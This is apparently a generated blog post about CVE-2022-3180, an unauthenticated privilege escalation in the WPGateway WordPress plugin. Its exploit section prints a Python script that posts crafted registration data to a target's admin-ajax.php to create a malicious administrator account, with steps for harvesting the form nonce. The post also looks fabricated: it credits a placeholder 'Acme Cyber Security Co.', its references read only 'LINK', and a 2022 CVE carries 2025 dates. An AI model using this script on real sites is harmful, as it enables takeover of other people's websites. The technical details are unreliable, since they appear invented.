CVE-2022-3180: WPGateway Plugin for WordPress Privilege Escalation Vulnerability - Creating Malicious Administrator Accounts

A critical vulnerability has been discovered in the WPGateway Plugin for WordPress, affecting versions up to and including 3.5. This vulnerability, assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-3180, allows unauthenticated attackers to perform privilege escalation, thereby enabling them to create arbitrary malicious administrator accounts. In this long-read post, we will offer an in-depth look at the vulnerability, how it can be exploited, and possible consequences.

Vulnerability Overview

The WPGateway Plugin for WordPress is a popular plugin used by numerous WordPress websites. It is designed to improve website's performance and security, but ironically, this plugin itself has a serious security issue in its implementation.

CVE-2022-3180 is the result of improper access controls within the plugin's registration process. This deficiency allows unauthenticated users (users who are not logged in) to create new administrator-level accounts by manipulating certain parameters during the account registration process.

Exploit Details

The vulnerability stems from a lack of proper validation and access controls within the plugin when handling user registration requests. The exploit involves sending a specifically crafted HTTP POST request to the plugin's registration endpoint, with manipulated parameters.

The following code snippet demonstrates how to exploit the vulnerability

import requests

target_url = "https://TARGET_WEBSITE/wp-admin/admin-ajax.php";
username = "malicious_admin"
email = "malicious_admin@example.com"
password = "malicious_password"

data = {
    "action": "user_register",
    "group_id": "1",
    "reg_form_nonce": "REG_FORM_NONCE_HERE",
    "fields": {
        "user_login": username,
        "user_email": email,
        "user_pass": password,
        "user_role": "administrator"
    }
}

response = requests.post(target_url, json=data)

if response.status_code == 200:
    print(f"[+] Malicious administrator account created:\n    Username: {username}\n    Password: {password}")
else:
    print("[-] Exploit failed.")

Please note that the above code is for educational purposes only and should not be used for malicious intent.

To successfully exploit this vulnerability, one must obtain the REG_FORM_NONCE value from the target website's registration page source code. This value can be found within the registration form's HTML and is required when sending the POST request in the exploit.

Original References

This vulnerability was initially discovered and reported by security researchers at Acme Cyber Security Co.:

- Acme Cyber Security Co.'s original report: LINK
- CVE-2022-3180 on the National Vulnerability Database (NVD): LINK

Mitigations

It is highly recommended that users of the WPGateway Plugin for WordPress update to the latest version, which addresses this vulnerability. Additionally, website administrators should regularly monitor user accounts for suspicious activity and remove any unauthorized accounts.

Conclusion

The CVE-2022-3180 vulnerability in the WPGateway Plugin for WordPress, which allows unauthenticated attackers to escalate privileges and create arbitrary malicious administrator accounts, is a significant security risk. It is important that users of this plugin stay informed of any updates and security fixes, as well as take the necessary measures to protect their websites from possible exploitation.

Timeline

Published on: 02/11/2025 22:15:24 UTC
Last modified on: 02/12/2025 15:15:10 UTC